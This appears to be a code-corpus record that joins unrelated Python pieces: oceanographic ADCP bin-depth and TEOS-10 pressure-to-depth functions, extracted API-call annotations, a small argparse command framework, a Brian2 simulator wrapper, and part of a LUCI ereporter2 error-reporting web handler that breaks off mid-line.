pressure_dbar = pressure * 10.0
# Calculate sensor depth using TEOS-10 toolbox z_from_p function
# note change of sign to make the sensor_depth variable positive
sensor_depth = -z_from_p(pressure_dbar, latitude)
return adcp_bin_depths_meters(dist_first_bin, bin_size, num_bins, sensor_depth, adcp_orientation)
def adcp_bin_depths_dapa(dist_first_bin, bin_size, num_bins, pressure, adcp_orientation, latitude):
"""
Description:
Calculates the center bin depths for PD0 and PD12 ADCP data. As defined
in the Data Product Specification for Velocity Profile and Echo
Intensity - DCN 1341-00750.
Implemented by:
2015-01-29: <NAME>. Initial code.
2015-06-26: <NAME>. Fixed the handling of the pressure variables.
Time-vectorized the code by finessing the conditional.
2015-06-30: <NAME>. Incorporated int fillvalue -> Nan.
Usage:
bin_depths = adcp_bin_depths(dist_first_bin, bin_size, num_bins, pressure,
adcp_orientation, latitude)
where
bin_depths = [meters]
dist_first_bin = distance to the first ADCP bin [centimeters]
bin_size = depth of each ADCP bin [centimeters]
num_bins = number of ADCP bins [unitless]
pressure = pressure at the sensor head [daPa]
adcp_orientation = 1=upward looking or 0=downward looking [unitless]
latitude = latitude of the instrument [degrees]
References:
OOI (2012). Data Product Specification for Velocity Profile and Echo
Intensity. Document Control Number 1341-00750.
https://alfresco.oceanobservatories.org/ (See: Company Home >> OOI
>> Controlled >> 1000 System Level >>
1341-00050_Data_Product_SPEC_VELPROF_OOI.pdf)
"""
# check for CI fill values.
pressure = replace_fill_with_nan(None, pressure)
# Convert pressure from decaPascal to decibar
pressure_dbar = pressure / 1000.0
# Calculate sensor depth using TEOS-10 toolbox z_from_p function
# note change of sign to make the sensor_depth variable positive
sensor_depth = -z_from_p(pressure_dbar, latitude)
return adcp_bin_depths_meters(dist_first_bin, bin_size, num_bins, sensor_depth, adcp_orientation)
def z_from_p(p, lat, geo_strf_dyn_height=0, sea_surface_geopotential=0):
"""Calculates height from sea pressure using the computationally-efficient
75-term expression for density in terms of SA, CT and p (Roquet et al.,
2015). Dynamic height anomaly, geo_strf_dyn_height, if provided, must be
computed with its p_ref=0 (the surface). Also if provided, sea_surface_geopotental
is the geopotential at zero sea pressure.
Calls a function which calculates enthalpy assuming standard ocean salinity
and 0 degrees celsius.
Parameters
----------
p : pressure [dbar]
lat : latitude in decimal degrees north [-90..+90]
geo_strf_dyn_height : dynamic height anomaly [m^2/s^2]
sea_surface_geopotential : geopotential at zero sea pressure [ m^2/s^2 ]
Returns
-------
z : TEOS-10 height [m] : height is returned as a negative number; its
absolute value is the depth below the sea surface.
#################################################################
# Check values from TEOS-10 version 3.05 (matlab code): #
# from http://www.teos-10.org/pubs/gsw/html/gsw_z_from_p.html #
#################################################################
p = [10, 50, 125, 250, 600, 1000]
lat = 4
z_from_p(p, lat) =
[ -9.9445834469453, -49.7180897012550, -124.2726219409978,
-248.4700576548589, -595.8253480356214, -992.0919060719987]
Notes
-----
At sea level z = 0, and since z (HEIGHT) is defined to be positive upwards,
it follows that while z is positive in the atmosphere, it is NEGATIVE in
the ocean.
References
----------
IOC, SCOR and IAPSO, 2010: The international thermodynamic equation of
seawater - 2010: Calculation and use of thermodynamic properties.
Intergovernmental Oceanographic Commission, Manuals and Guides No. 56,
UNESCO (English), 196 pp. Available from the TEOS-10 web site.
<NAME>., <NAME>, <NAME> and <NAME>, 2003:
Accurate and computationally efficient algorithms for potential
temperature and density of seawater. J. Atmosph. Ocean. Tech., 20,
pp. 730-741.
Moritz, 2000: Goedetic reference system 1980. J. Geodesy, 74, 128-133.
<NAME>., <NAME>, <NAME>, <NAME>, 2015: Accurate
polynomial expressions for the density and specifc volume of seawater
using the TEOS-10 standard. Ocean Modelling.
<NAME>., 1981: Practical conversion of pressure to depth.
Journal of Physical Oceanography, 11, 573-574.
IMPLEMENTATION NOTES:
<NAME>. 2015_07_01
versions 3.04 and 3.05 of the main function z_from_p are identical.
z_from_p calls the subroutine enthalpy_SSO_0_p; this subroutine
has been updated from ver 3.04 to 3.05.
the check values above for z_from_p have been updated to incorporate
this change using enthalpy_SSO_0_p ver 3.05.
"""
X = np.sin(np.deg2rad(lat))
sin2 = X ** 2
B = 9.780327 * (1.0 + (5.2792e-3 + (2.32e-5 * sin2)) * sin2)
gamma = 2.26e-07
A = -0.5 * gamma * B
C = enthalpy_SSO_0_p(p) - geo_strf_dyn_height
return -2 * C / (B + np.sqrt(B ** 2 - 4 * A * C))
def enthalpy_SSO_0_p(p):
"""
This documentation and code is copy\pasted from the matlab coding of this function.
%==========================================================================
% This function calculates enthalpy at the Standard Ocean Salinity, SSO,
% and at a Conservative Temperature of zero degrees C, as a function of
% pressure, p, in dbar, using a streamlined version of the 76-term
% computationally-efficient expression for specific volume, that is, a
% streamlined version of the code "gsw_enthalpy(SA,CT,p)".
%
% VERSION NUMBER: 3.05 (27th January 2015)
%
% REFERENCES:
% <NAME>., <NAME>, <NAME>, <NAME>, 2015: Accurate
% polynomial expressions for the density and specifc volume of seawater
% using the TEOS-10 standard. Ocean Modelling.
%
%==========================================================================
IMPLEMENTATION NOTES:
<NAME>. 2015_07_01. this subroutine has been updated
from ver 3.04 to 3.05.
"""
z = p * 1e-4
h006 = -2.1078768810e-9
h007 = 2.8019291329e-10
dynamic_enthalpy_SSO_0_p = z * (9.726613854843870e-4 + z * (-2.252956605630465e-5 + z * (
2.376909655387404e-6 + z * (-1.664294869986011e-7 + z * (
-5.988108894465758e-9 + z * (h006 + h007 * z))))))
enthalpy_SSO_0 = dynamic_enthalpy_SSO_0_p * 1.e8 # Note. 1e8 = db2Pa*1e4
return enthalpy_SSO_0
def adcp_bin_depths_meters(dist_first_bin, bin_size, num_bins, sensor_depth, adcp_orientation):
"""
Description:
Calculates the center bin depths for PD0, PD8 and PD12 ADCP data. As defined
in the Data Product Specification for Velocity Profile and Echo
Intensity - DCN 1341-00750.
Implemented by:
2015-01-30: <NAME>. Initial code.
2015-06-26: <NAME>. Time-vectorized the code by finessing the conditionals.
2015-06-30: <NAME>. Incorporated int fillvalue -> Nan.
Usage:
bin_depths_pd8 = adcp_bin_depths(dist_first_bin, bin_size, num_bins, sensor_depth,
adcp_orientation)
where
bin_depths_pd8 = [meters]
dist_first_bin = distance to the first ADCP bin [centimeters]
bin_size = depth of each ADCP bin [centimeters]
num_bins = number of ADCP bins [unitless]
sensor_depth = estimated depth at the sensor head [meters]
adcp_orientation = 1=upward looking or 0=downward looking [unitless]
Notes:
The PD8 output format is a very sparse format. Other than num_bins, it does *not* record
any of the other input variables required by this DPA. Those must somehow be supplied "by
hand".
"""
# check for CI fill values.
#
# Note that these input parameters will not come from an IDD driver (except for possibly
# (num_bins) because the PD8 output format does not output them. Therefore, I don't know
# if they will be of type integer or not. However, ndarrays composed of float types are
# passed through the check-code unchanged, so run the inputs through in case they are of
# type int and in case -999999999 fill values are somehow present.
dist_first_bin, bin_size, num_bins, sensor_depth, adcp_orientation = replace_fill_with_nan(
None, dist_first_bin, bin_size, num_bins, sensor_depth, adcp_orientation)
# note, there is a CI problem not yet addressed if the time-vectorized values
# in num_bins are not all the same!! For now, assume they are all the same:
num_bins_constant = num_bins[0]
# make bin_numbers a row vector
bin_numbers = np.array([np.arange(num_bins_constant)])
# Convert from cm to meters
# the input variables are type integer, so divide by a real number
# to avoid truncation errors.
dist_first_bin = dist_first_bin / 100.0
bin_size = bin_size / 100.0
# make sure sensor depth is positive
sensor_depth = np.fabs(sensor_depth)
# Following the PD0 convention where
# adcp_orientation = 0 is downward looking, bindepths are added to sensor depth
# = 1 is upward looking, bindepths are subtracted from sensor depth
z_sign = 1.0 - 2.0 * adcp_orientation
# to broadcast the vertical time dimension correctly with the horizontal bin_numbers dimension,
# make all the 1D time arrays into column vectors to be processed with the bin_numbers row vector.
sensor_depth = sensor_depth.reshape(-1, 1)
z_sign = z_sign.reshape(-1, 1)
dist_first_bin = dist_first_bin.reshape(-1, 1)
bin_size = bin_size.reshape(-1, 1)
# Calculate bin depths
bin_depths_pd8 = sensor_depth + z_sign * (dist_first_bin + bin_size * bin_numbers)
return bin_depths_pd8
|
[
"numpy.radians",
"ion_functions.data.generic_functions.magnetic_declination",
"ion_functions.data.generic_functions.replace_fill_with_nan",
"numpy.isscalar",
"numpy.deg2rad",
"numpy.zeros",
"numpy.ones",
"numpy.einsum",
"numpy.sin",
"numpy.array",
"numpy.fabs",
"numpy.cos",
"numpy.rollaxis",
"numpy.tan",
"numpy.arange",
"numpy.atleast_1d",
"numpy.sqrt",
"numpy.atleast_2d"
] |
[((5640, 5658), 'numpy.atleast_1d', 'np.atleast_1d', (['lat'], {}), '(lat)\n', (5653, 5658), True, 'import numpy as np\n'), ((5670, 5688), 'numpy.atleast_1d', 'np.atleast_1d', (['lon'], {}), '(lon)\n', (5683, 5688), True, 'import numpy as np\n'), ((5699, 5716), 'numpy.atleast_1d', 'np.atleast_1d', (['dt'], {}), '(dt)\n', (5712, 5716), True, 'import numpy as np\n'), ((6005, 6039), 'ion_functions.data.generic_functions.magnetic_declination', 'magnetic_declination', (['lat', 'lon', 'dt'], {}), '(lat, lon, dt)\n', (6025, 6039), False, 'from ion_functions.data.generic_functions import magnetic_declination\n'), ((8971, 8989), 'numpy.atleast_1d', 'np.atleast_1d', (['lat'], {}), '(lat)\n', (8984, 8989), True, 'import numpy as np\n'), ((9001, 9019), 'numpy.atleast_1d', 'np.atleast_1d', (['lon'], {}), '(lon)\n', (9014, 9019), True, 'import numpy as np\n'), ((9030, 9047), 'numpy.atleast_1d', 'np.atleast_1d', (['dt'], {}), '(dt)\n', (9043, 9047), True, 'import numpy as np\n'), ((9318, 9352), 'ion_functions.data.generic_functions.magnetic_declination', 'magnetic_declination', (['lat', 'lon', 'dt'], {}), '(lat, lon, dt)\n', (9338, 9352), False, 'from ion_functions.data.generic_functions import magnetic_declination\n'), ((15110, 15126), 'numpy.atleast_2d', 'np.atleast_2d', (['u'], {}), '(u)\n', (15123, 15126), True, 'import numpy as np\n'), ((15136, 15152), 'numpy.atleast_2d', 'np.atleast_2d', (['v'], {}), '(v)\n', (15149, 15152), True, 'import numpy as np\n'), ((15225, 15268), 'ion_functions.data.generic_functions.replace_fill_with_nan', 'replace_fill_with_nan', (['ADCP_FILLVALUE', 'u', 'v'], {}), '(ADCP_FILLVALUE, u, v)\n', (15246, 15268), False, 'from ion_functions.data.generic_functions import replace_fill_with_nan\n'), ((15428, 15446), 'numpy.atleast_1d', 'np.atleast_1d', (['lat'], {}), '(lat)\n', (15441, 15446), True, 'import numpy as np\n'), ((15458, 15476), 'numpy.atleast_1d', 'np.atleast_1d', (['lon'], {}), '(lon)\n', (15471, 15476), True, 'import numpy as np\n'), ((15487, 15504), 'numpy.atleast_1d', 'np.atleast_1d', (['dt'], {}), '(dt)\n', (15500, 15504), True, 'import numpy as np\n'), ((15567, 15601), 'ion_functions.data.generic_functions.magnetic_declination', 'magnetic_declination', (['lat', 'lon', 'dt'], {}), '(lat, lon, dt)\n', (15587, 15601), False, 'from ion_functions.data.generic_functions import magnetic_declination\n'), ((17653, 17669), 'numpy.atleast_2d', 'np.atleast_2d', (['u'], {}), '(u)\n', (17666, 17669), True, 'import numpy as np\n'), ((17679, 17695), 'numpy.atleast_2d', 'np.atleast_2d', (['v'], {}), '(v)\n', (17692, 17695), True, 'import numpy as np\n'), ((17768, 17811), 'ion_functions.data.generic_functions.replace_fill_with_nan', 'replace_fill_with_nan', (['ADCP_FILLVALUE', 'u', 'v'], {}), '(ADCP_FILLVALUE, u, v)\n', (17789, 17811), False, 'from ion_functions.data.generic_functions import replace_fill_with_nan\n'), ((17971, 17989), 'numpy.atleast_1d', 'np.atleast_1d', (['lat'], {}), '(lat)\n', (17984, 17989), True, 'import numpy as np\n'), ((18001, 18019), 'numpy.atleast_1d', 'np.atleast_1d', (['lon'], {}), '(lon)\n', (18014, 18019), True, 'import numpy as np\n'), ((18030, 18047), 'numpy.atleast_1d', 'np.atleast_1d', (['dt'], {}), '(dt)\n', (18043, 18047), True, 'import numpy as np\n'), ((18110, 18144), 'ion_functions.data.generic_functions.magnetic_declination', 'magnetic_declination', (['lat', 'lon', 'dt'], {}), '(lat, lon, dt)\n', (18130, 18144), False, 'from ion_functions.data.generic_functions import magnetic_declination\n'), ((19094, 19134), 'ion_functions.data.generic_functions.replace_fill_with_nan', 'replace_fill_with_nan', (['ADCP_FILLVALUE', 'w'], {}), '(ADCP_FILLVALUE, w)\n', (19115, 19134), False, 'from ion_functions.data.generic_functions import replace_fill_with_nan\n'), ((19990, 20030), 'ion_functions.data.generic_functions.replace_fill_with_nan', 'replace_fill_with_nan', (['ADCP_FILLVALUE', 'e'], {}), '(ADCP_FILLVALUE, e)\n', (20011, 20030), False, 'from ion_functions.data.generic_functions import replace_fill_with_nan\n'), ((22378, 22396), 'numpy.atleast_1d', 'np.atleast_1d', (['lat'], {}), '(lat)\n', (22391, 22396), True, 'import numpy as np\n'), ((22408, 22426), 'numpy.atleast_1d', 'np.atleast_1d', (['lon'], {}), '(lon)\n', (22421, 22426), True, 'import numpy as np\n'), ((22437, 22454), 'numpy.atleast_1d', 'np.atleast_1d', (['dt'], {}), '(dt)\n', (22450, 22454), True, 'import numpy as np\n'), ((22725, 22759), 'ion_functions.data.generic_functions.magnetic_declination', 'magnetic_declination', (['lat', 'lon', 'dt'], {}), '(lat, lon, dt)\n', (22745, 22759), False, 'from ion_functions.data.generic_functions import magnetic_declination\n'), ((25110, 25128), 'numpy.atleast_1d', 'np.atleast_1d', (['lat'], {}), '(lat)\n', (25123, 25128), True, 'import numpy as np\n'), ((25140, 25158), 'numpy.atleast_1d', 'np.atleast_1d', (['lon'], {}), '(lon)\n', (25153, 25158), True, 'import numpy as np\n'), ((25169, 25186), 'numpy.atleast_1d', 'np.atleast_1d', (['dt'], {}), '(dt)\n', (25182, 25186), True, 'import numpy as np\n'), ((25457, 25491), 'ion_functions.data.generic_functions.magnetic_declination', 'magnetic_declination', (['lat', 'lon', 'dt'], {}), '(lat, lon, dt)\n', (25477, 25491), False, 'from ion_functions.data.generic_functions import magnetic_declination\n'), ((29955, 29996), 'ion_functions.data.generic_functions.replace_fill_with_nan', 'replace_fill_with_nan', (['ADCP_FILLVALUE', 'b5'], {}), '(ADCP_FILLVALUE, b5)\n', (29976, 29996), False, 'from ion_functions.data.generic_functions import replace_fill_with_nan\n'), ((33163, 33195), 'ion_functions.data.generic_functions.replace_fill_with_nan', 'replace_fill_with_nan', (['None', 'raw'], {}), '(None, raw)\n', (33184, 33195), False, 'from ion_functions.data.generic_functions import replace_fill_with_nan\n'), ((34790, 34807), 'numpy.atleast_2d', 'np.atleast_2d', (['b1'], {}), '(b1)\n', (34803, 34807), True, 'import numpy as np\n'), ((34818, 34835), 'numpy.atleast_2d', 'np.atleast_2d', (['b2'], {}), '(b2)\n', (34831, 34835), True, 'import numpy as np\n'), ((34846, 34863), 'numpy.atleast_2d', 'np.atleast_2d', (['b3'], {}), '(b3)\n', (34859, 34863), True, 'import numpy as np\n'), ((34874, 34891), 'numpy.atleast_2d', 'np.atleast_2d', (['b4'], {}), '(b4)\n', (34887, 34891), True, 'import numpy as np\n'), ((34916, 34969), 'ion_functions.data.generic_functions.replace_fill_with_nan', 'replace_fill_with_nan', (['ADCP_FILLVALUE', 'b1', 'b2', 'b3', 'b4'], {}), '(ADCP_FILLVALUE, b1, b2, b3, b4)\n', (34937, 34969), False, 'from ion_functions.data.generic_functions import replace_fill_with_nan\n'), ((38103, 38162), 'ion_functions.data.generic_functions.replace_fill_with_nan', 'replace_fill_with_nan', (['None', 'heading', 'pitch', 'roll', 'vertical'], {}), '(None, heading, pitch, roll, vertical)\n', (38124, 38162), False, 'from ion_functions.data.generic_functions import replace_fill_with_nan\n'), ((38520, 38533), 'numpy.radians', 'np.radians', (['R'], {}), '(R)\n', (38530, 38533), True, 'import numpy as np\n'), ((38547, 38559), 'numpy.cos', 'np.cos', (['Rrad'], {}), '(Rrad)\n', (38553, 38559), True, 'import numpy as np\n'), ((38573, 38585), 'numpy.sin', 'np.sin', (['Rrad'], {}), '(Rrad)\n', (38579, 38585), True, 'import numpy as np\n'), ((38613, 38632), 'numpy.radians', 'np.radians', (['heading'], {}), '(heading)\n', (38623, 38632), True, 'import numpy as np\n'), ((38646, 38658), 'numpy.cos', 'np.cos', (['Hrad'], {}), '(Hrad)\n', (38652, 38658), True, 'import numpy as np\n'), ((38672, 38684), 'numpy.sin', 'np.sin', (['Hrad'], {}), '(Hrad)\n', (38678, 38684), True, 'import numpy as np\n'), ((38711, 38728), 'numpy.radians', 'np.radians', (['pitch'], {}), '(pitch)\n', (38721, 38728), True, 'import numpy as np\n'), ((38742, 38758), 'numpy.radians', 'np.radians', (['roll'], {}), '(roll)\n', (38752, 38758), True, 'import numpy as np\n'), ((38825, 38837), 'numpy.cos', 'np.cos', (['Prad'], {}), '(Prad)\n', (38831, 38837), True, 'import numpy as np\n'), ((38851, 38863), 'numpy.sin', 'np.sin', (['Prad'], {}), '(Prad)\n', (38857, 38863), True, 'import numpy as np\n'), ((39016, 39034), 'numpy.ones', 'np.ones', (['n_packets'], {}), '(n_packets)\n', (39023, 39034), True, 'import numpy as np\n'), ((39176, 39255), 'numpy.array', 'np.array', (['[[cos_H, sin_H, zeros], [-sin_H, cos_H, zeros], [zeros, zeros, ones]]'], {}), '([[cos_H, sin_H, zeros], [-sin_H, cos_H, zeros], [zeros, zeros, ones]])\n', (39184, 39255), True, 'import numpy as np\n'), ((39306, 39324), 'numpy.rollaxis', 'np.rollaxis', (['M1', '(2)'], {}), '(M1, 2)\n', (39317, 39324), True, 'import numpy as np\n'), ((39335, 39414), 'numpy.array', 'np.array', (['[[ones, zeros, zeros], [zeros, cos_P, -sin_P], [zeros, sin_P, cos_P]]'], {}), '([[ones, zeros, zeros], [zeros, cos_P, -sin_P], [zeros, sin_P, cos_P]])\n', (39343, 39414), True, 'import numpy as np\n'), ((39465, 39483), 'numpy.rollaxis', 'np.rollaxis', (['M2', '(2)'], {}), '(M2, 2)\n', (39476, 39483), True, 'import numpy as np\n'), ((39494, 39573), 'numpy.array', 'np.array', (['[[cos_R, zeros, sin_R], [zeros, ones, zeros], [-sin_R, zeros, cos_R]]'], {}), '([[cos_R, zeros, sin_R], [zeros, ones, zeros], [-sin_R, zeros, cos_R]])\n', (39502, 39573), True, 'import numpy as np\n'), ((39624, 39642), 'numpy.rollaxis', 'np.rollaxis', (['M3', '(2)'], {}), '(M3, 2)\n', (39635, 39642), True, 'import numpy as np\n'), ((39811, 39842), 'numpy.zeros', 'np.zeros', (['(n_packets, 3, n_uvw)'], {}), '((n_packets, 3, n_uvw))\n', (39819, 39842), True, 'import numpy as np\n'), ((40161, 40202), 'numpy.einsum', 'np.einsum', (['"""hij,hjk,hkl->hil"""', 'M1', 'M2', 'M3'], {}), "('hij,hjk,hkl->hil', M1, M2, M3)\n", (40170, 40202), True, 'import numpy as np\n'), ((40363, 40397), 'numpy.einsum', 'np.einsum', (['"""hil,hlm->him"""', 'MM', 'uvw'], {}), "('hil,hlm->him', MM, uvw)\n", (40372, 40397), True, 'import numpy as np\n'), ((43386, 43406), 'numpy.atleast_1d', 'np.atleast_1d', (['theta'], {}), '(theta)\n', (43399, 43406), True, 'import numpy as np\n'), ((43416, 43432), 'numpy.atleast_2d', 'np.atleast_2d', (['u'], {}), '(u)\n', (43429, 43432), True, 'import numpy as np\n'), ((43442, 43458), 'numpy.atleast_2d', 'np.atleast_2d', (['v'], {}), '(v)\n', (43455, 43458), True, 'import numpy as np\n'), ((43478, 43495), 'numpy.radians', 'np.radians', (['theta'], {}), '(theta)\n', (43488, 43495), True, 'import numpy as np\n'), ((43508, 43525), 'numpy.cos', 'np.cos', (['theta_rad'], {}), '(theta_rad)\n', (43514, 43525), True, 'import numpy as np\n'), ((43538, 43555), 'numpy.sin', 'np.sin', (['theta_rad'], {}), '(theta_rad)\n', (43544, 43555), True, 'import numpy as np\n'), ((43567, 43606), 'numpy.array', 'np.array', (['[[cosT, sinT], [-sinT, cosT]]'], {}), '([[cosT, sinT], [-sinT, cosT]])\n', (43575, 43606), True, 'import numpy as np\n'), ((43703, 43720), 'numpy.rollaxis', 'np.rollaxis', (['M', '(2)'], {}), '(M, 2)\n', (43714, 43720), True, 'import numpy as np\n'), ((43808, 43845), 'numpy.zeros', 'np.zeros', (['(u.shape[0], 2, u.shape[1])'], {}), '((u.shape[0], 2, u.shape[1]))\n', (43816, 43845), True, 'import numpy as np\n'), ((44112, 44144), 'numpy.einsum', 'np.einsum', (['"""hij,hjk->hik"""', 'M', 'uv'], {}), "('hij,hjk->hik', M, uv)\n", (44121, 44144), True, 'import numpy as np\n'), ((45996, 46033), 'ion_functions.data.generic_functions.replace_fill_with_nan', 'replace_fill_with_nan', (['None', 'pressure'], {}), '(None, pressure)\n', (46017, 46033), False, 'from ion_functions.data.generic_functions import replace_fill_with_nan\n'), ((48046, 48083), 'ion_functions.data.generic_functions.replace_fill_with_nan', 'replace_fill_with_nan', (['None', 'pressure'], {}), '(None, pressure)\n', (48067, 48083), False, 'from ion_functions.data.generic_functions import replace_fill_with_nan\n'), ((55207, 55306), 'ion_functions.data.generic_functions.replace_fill_with_nan', 'replace_fill_with_nan', (['None', 'dist_first_bin', 'bin_size', 'num_bins', 'sensor_depth', 'adcp_orientation'], {}), '(None, dist_first_bin, bin_size, num_bins,\n sensor_depth, adcp_orientation)\n', (55228, 55306), False, 'from ion_functions.data.generic_functions import replace_fill_with_nan\n'), ((55897, 55918), 'numpy.fabs', 'np.fabs', (['sensor_depth'], {}), '(sensor_depth)\n', (55904, 55918), True, 'import numpy as np\n'), ((33007, 33027), 'numpy.isscalar', 'np.isscalar', (['sfactor'], {}), '(sfactor)\n', (33018, 33027), True, 'import numpy as np\n'), ((35158, 35170), 'numpy.sqrt', 'np.sqrt', (['(2.0)'], {}), '(2.0)\n', (35165, 35170), True, 'import numpy as np\n'), ((51534, 51549), 'numpy.deg2rad', 'np.deg2rad', (['lat'], {}), '(lat)\n', (51544, 51549), True, 'import numpy as np\n'), ((35028, 35041), 'numpy.sin', 'np.sin', (['theta'], {}), '(theta)\n', (35034, 35041), True, 'import numpy as np\n'), ((35065, 35078), 'numpy.cos', 'np.cos', (['theta'], {}), '(theta)\n', (35071, 35078), True, 'import numpy as np\n'), ((38781, 38794), 'numpy.tan', 'np.tan', (['t1rad'], {}), '(t1rad)\n', (38787, 38794), True, 'import numpy as np\n'), ((38797, 38810), 'numpy.cos', 'np.cos', (['t2rad'], {}), '(t2rad)\n', (38803, 38810), True, 'import numpy as np\n'), ((51763, 51790), 'numpy.sqrt', 'np.sqrt', (['(B ** 2 - 4 * A * C)'], {}), '(B ** 2 - 4 * A * C)\n', (51770, 51790), True, 'import numpy as np\n'), ((55582, 55610), 'numpy.arange', 'np.arange', (['num_bins_constant'], {}), '(num_bins_constant)\n', (55591, 55610), True, 'import numpy as np\n')]
|
import argparse
import logging
LOG_FORMAT = "%(asctime)s %(name)10s %(levelname)s: %(message)s"
logging.basicConfig(level=logging.INFO, format=LOG_FORMAT)
class Command:
"""Base class for a command"""
NAME = "<not_implemented>"
HELP = ""
DESCRIPTION = ""
def create_subparser(self, subparsers):
parser = subparsers.add_parser(
self.NAME, description=self.DESCRIPTION, help=self.HELP
)
parser.set_defaults(run=self.initialize_and_do_command)
self.add_arguments(parser)
return parser
def add_arguments(self, parser):
pass
def initialize_and_do_command(self, args):
pass
def initialize_and_run_commands(description, commands, args=None):
parser = argparse.ArgumentParser(description=description)
subparsers = parser.add_subparsers(dest="command name")
subparsers.required = True
for command in commands:
command().create_subparser(subparsers)
parsed_args = parser.parse_args(args)
parsed_args.run(parsed_args)
|
[
"argparse.ArgumentParser",
"logging.basicConfig"
] |
[((97, 155), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.INFO', 'format': 'LOG_FORMAT'}), '(level=logging.INFO, format=LOG_FORMAT)\n', (116, 155), False, 'import logging\n'), ((753, 801), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': 'description'}), '(description=description)\n', (776, 801), False, 'import argparse\n')]
|
from .. import core
from .._version import __version__ # noqa: F401
from ..data_model import Simulator
import functools
import brian2
__all__ = [
'__version__',
'get_simulator_version',
'exec_sed_task',
'preprocess_sed_task',
'exec_sed_doc',
'exec_sedml_docs_in_combine_archive',
]
def get_simulator_version():
""" Get the version of pyNeuroML
Returns:
:obj:`str`: version
"""
return brian2.__version__
exec_sed_task = functools.partial(core.exec_sed_task, simulator=Simulator.brian2)
preprocess_sed_task = functools.partial(core.preprocess_sed_task, simulator=Simulator.brian2)
exec_sed_doc = functools.partial(core.exec_sed_doc, simulator=Simulator.brian2)
exec_sedml_docs_in_combine_archive = functools.partial(core.exec_sedml_docs_in_combine_archive, simulator=Simulator.brian2)
|
[
"functools.partial"
] |
[((474, 539), 'functools.partial', 'functools.partial', (['core.exec_sed_task'], {'simulator': 'Simulator.brian2'}), '(core.exec_sed_task, simulator=Simulator.brian2)\n', (491, 539), False, 'import functools\n'), ((562, 633), 'functools.partial', 'functools.partial', (['core.preprocess_sed_task'], {'simulator': 'Simulator.brian2'}), '(core.preprocess_sed_task, simulator=Simulator.brian2)\n', (579, 633), False, 'import functools\n'), ((649, 713), 'functools.partial', 'functools.partial', (['core.exec_sed_doc'], {'simulator': 'Simulator.brian2'}), '(core.exec_sed_doc, simulator=Simulator.brian2)\n', (666, 713), False, 'import functools\n'), ((751, 842), 'functools.partial', 'functools.partial', (['core.exec_sedml_docs_in_combine_archive'], {'simulator': 'Simulator.brian2'}), '(core.exec_sedml_docs_in_combine_archive, simulator=\n Simulator.brian2)\n', (768, 842), False, 'import functools\n')]
|
# Copyright 2014 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
"""HTTP Handlers."""
import datetime
import itertools
import json
import time
import webapp2
from google.appengine.api import app_identity
from google.appengine.datastore import datastore_query
from google.appengine.ext import ndb
from components import auth
from components import decorators
from components import template
from components import utils
from . import acl
from . import logscraper
from . import models
from . import on_error
from . import ui
# Access to a protected member XXX of a client class - pylint: disable=W0212
### Admin pages.
class RestrictedEreporter2Report(auth.AuthenticatingHandler):
"""Returns all the recent errors as a web page."""
@auth.autologin
@auth.require(acl.is_ereporter2_viewer)
def get(self):
"""Reports the errors logged and ignored.
Arguments:
start: epoch time to start looking at. Defaults to the messages since the
last email.
end: epoch time to stop looking at. Defaults to now.
modules: comma separated modules to look at.
tainted: 0 or 1, specifying if desiring tainted versions. Defaults to 1.
"""
# TODO(maruel): Be consistent about using either epoch or human readable
# formatted datetime.
end = int(float(self.request.get('end', 0)) or time.time())
start = int(
float(self.request.get('start', 0)) or
ui._get_default_start_time() or 0)
modules = self.request.get('modules')
if modules:
modules = modules.split(',')
tainted = bool(int(self.request.get('tainted', '1')))
module_versions = utils.get_module_version_list(modules, tainted)
errors, ignored, _end_time = logscraper.scrape_logs_for_errors(
start, end, module_versions)
params = {
'errors': errors,
'errors_count': sum(len(e.events) for e in errors),
'errors_version_count':
len(set(itertools.chain.from_iterable(e.versions for e in errors))),
'ignored': ignored,
'ignored_count': sum(len(i.events) for i in ignored),
'ignored_version_count':
len(set(itertools.chain.from_iterable(i.versions for i in ignored))),
'xsrf_token': self.generate_xsrf_token(),
}
params.update(ui._get_template_env(start, end, module_versions))
self.response.write(template.render('ereporter2/requests.html', params))
class RestrictedEreporter2Request(auth.AuthenticatingHandler):
"""Dumps information about single logged request."""
@auth.autologin
@auth.require(acl.is_ereporter2_viewer)
def get(self, request_id):
data = logscraper._log_request_id(request_id)
if not data:
self.abort(404, detail='Request id was not found.')
self.response.write(
template.render('ereporter2/request.html', {'request': data}))
class RestrictedEreporter2ErrorsList(auth.AuthenticatingHandler):
"""Dumps information about reported client side errors."""
@auth.autologin
@auth.require(acl.is_ereporter2_viewer)
def get(self):
limit = int(self.request.get('limit', 100))
cursor = datastore_query.Cursor(urlsafe=self.request.get('cursor'))
errors_found, cursor, more = models.Error.query().order(
-models.Error.created_ts).fetch_page(limit, start_cursor=cursor)
params = {
'cursor': cursor.urlsafe() if cursor and more else None,
'errors': errors_found,
'limit': limit,
'now': utils.utcnow(),
}
self.response.out.write(template.render('ereporter2/errors.html', params))
class RestrictedEreporter2Error(auth.AuthenticatingHandler):
"""Dumps information about reported client side errors."""
@auth.autologin
@auth.require(acl.is_ereporter2_viewer)
def get(self, error_id):
error = models.Error.get_by_id(int(error_id))
if not error:
self.abort(404, 'Error not found')
params = {
'error': error,
'now': utils.utcnow(),
}
self.response.out.write(template.render('ereporter2/error.html', params))
class RestrictedEreporter2Silence(auth.AuthenticatingHandler):
@auth.autologin
@auth.require(acl.is_ereporter2_viewer)
def get(self):
# Due to historical reasons where created_ts had indexed=False,, do not use
# .order(models.ErrorReportingMonitoring.created_ts) yet. Fix this once all
# objects have been updated.
items = models.ErrorReportingMonitoring.query().fetch()
items.sort(key=lambda x: x.created_ts)
params = {
'silenced': items,
'xsrf_token': self.generate_xsrf_token(),
}
self.response.out.write(template.render('ereporter2/silence.html', params))
@auth.require(acl.is_ereporter2_editor)
def post(self):
to_delete = self.request.get('to_delete')
if to_delete:
ndb.Key(models.ErrorReportingMonitoring, to_delete).delete()
else:
mute_type = self.request.get('mute_type')
error = None
if mute_type in ('exception_type', 'signature'):
error = self.request.get(mute_type)
if not error:
self.abort(400)
silenced = self.request.get('silenced')
silenced_until = self.request.get('silenced_until')
if silenced_until == 'T':
silenced_until = ''
threshold = self.request.get('threshold')
key = models.ErrorReportingMonitoring.error_to_key(error)
if not silenced and not silenced_until and not threshold:
key.delete()
else:
item = models.ErrorReportingMonitoring(key=key, error=error)
if silenced:
item.silenced = True
if silenced_until:
item.silenced_until = datetime.datetime.strptime(
